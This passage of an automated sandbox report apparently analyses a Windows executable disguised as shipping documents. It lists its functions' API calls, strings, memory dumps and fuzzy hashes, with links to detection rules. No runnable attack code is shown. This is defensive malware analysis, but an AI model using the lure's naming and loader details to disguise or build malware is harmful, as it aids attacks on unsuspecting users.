                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                        • Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
                                        • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                        • Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05
                                        Function 0040759D Relevance: .3, Instructions: 300COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                        • Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
                                        • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                        • Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95
                                        Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                        • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                        • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                        • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                        • DeleteObject.GDI32(00000000), ref: 0040503D
                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                          • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                        • ShowWindow.USER32(?,00000005), ref: 0040519F
                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                        • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                        • GlobalFree.KERNEL32(?), ref: 0040537D
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                        • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                        • ShowWindow.USER32(?,00000000), ref: 00405527
                                        • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                        • ShowWindow.USER32(00000000), ref: 00405539
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 2564846305-813528018
                                        • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                        • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                        • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                        • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                        Function 00404695 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                        • GetSysColor.USER32(?), ref: 00404775
                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                        • lstrlenW.KERNEL32(?), ref: 00404796
                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                        • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                        • SendMessageW.USER32(00000000), ref: 00404818
                                        • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                        • SetCursor.USER32(00000000), ref: 00404897
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                        • SetCursor.USER32(00000000), ref: 004048B3
                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: Exec$N
                                        • API String ID: 3103080414-17853963
                                        • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                        • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                        • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                        • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                        • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                        • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                        • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                        Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                        • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                          • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                          • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                        • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                        • wsprintfA.USER32 ref: 0040621C
                                        • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                        • GlobalFree.KERNEL32(00000000), ref: 00406305
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                          • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,80000000,00000003), ref: 0040604B
                                          • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %ls=%ls$[Rename]
                                        • API String ID: 2171350718-461813615
                                        • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                        • Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
                                        • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                        • Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
                                        Function 6FE81B67 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 83processstringsynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCommandLineW.KERNEL32(00000400), ref: 6FE81B96
                                        • lstrcpynW.KERNEL32(?,00000000), ref: 6FE81BA4
                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6FE81C03
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FE81C15
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 6FE81C22
                                        • CloseHandle.KERNEL32(?), ref: 6FE81C31
                                        • CloseHandle.KERNEL32(?), ref: 6FE81C36
                                        • ExitProcess.KERNEL32 ref: 6FE81C3B
                                        • ExitProcess.KERNEL32 ref: 6FE81C46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2153670485.000000006FE81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE80000, based on PE: true
                                        • Associated: 00000000.00000002.2153651950.000000006FE80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.2153686664.000000006FE82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.2153704607.000000006FE83000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.2153723885.000000006FE84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fe80000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Process$Exit$CloseHandle$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                        • String ID: "$D
                                        • API String ID: 2956148522-1154559923
                                        • Opcode ID: 1d941b3dee5f3963ad1899b3ca2a608bc7806bb7e2ada5b28301a42859932711
                                        • Instruction ID: 73d955312f501d815e8978bd6bec794098d44492d84bc501cfcd5b13944da93d
                                        • Opcode Fuzzy Hash: 1d941b3dee5f3963ad1899b3ca2a608bc7806bb7e2ada5b28301a42859932711
                                        • Instruction Fuzzy Hash: FC21A171804519EADF25BBE0CD08ADFBF79FF02325F600016E23AB6190DB741A55DBA1
                                        Function 00406805 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                        • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                        • CharNextW.USER32(?,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                        • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406806
                                        • "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe", xrefs: 00406849
                                        • *?|<>/":, xrefs: 00406857
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-1390672379
                                        • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                        • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                        • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                        • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                        Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                        • GetSysColor.USER32(00000000), ref: 00404598
                                        • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                        • SetBkMode.GDI32(?,?), ref: 004045B0
                                        • GetSysColor.USER32(?), ref: 004045C3
                                        • SetBkColor.GDI32(?,?), ref: 004045D3
                                        • DeleteObject.GDI32(?), ref: 004045ED
                                        • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                        • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                        • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                        • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                        Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                          • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                        • String ID: 9
                                        • API String ID: 163830602-2366072709
                                        • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                        • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                        • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                        • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                        Function 6FE81987 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,6FE810E0), ref: 6FE81990
                                        • GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,6FE810E0), ref: 6FE8199E
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 6FE819BD
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 6FE819E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2153670485.000000006FE81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE80000, based on PE: true
                                        • Associated: 00000000.00000002.2153651950.000000006FE80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.2153686664.000000006FE82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.2153704607.000000006FE83000.00000004.00000001.01000000.00000005.sdmpDownload File
